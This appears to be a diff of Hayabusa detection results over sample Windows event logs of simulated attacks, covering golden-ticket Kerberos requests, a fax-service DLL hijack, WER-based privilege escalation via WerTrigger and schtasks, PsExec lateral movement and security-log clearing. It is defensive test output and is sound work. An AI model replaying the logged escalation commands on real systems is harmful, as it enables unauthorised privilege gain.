+2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
+2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50317  :  LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: 04246W-WIN10  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60728  :  LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser  :  Type: 2  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd8f6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd964  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
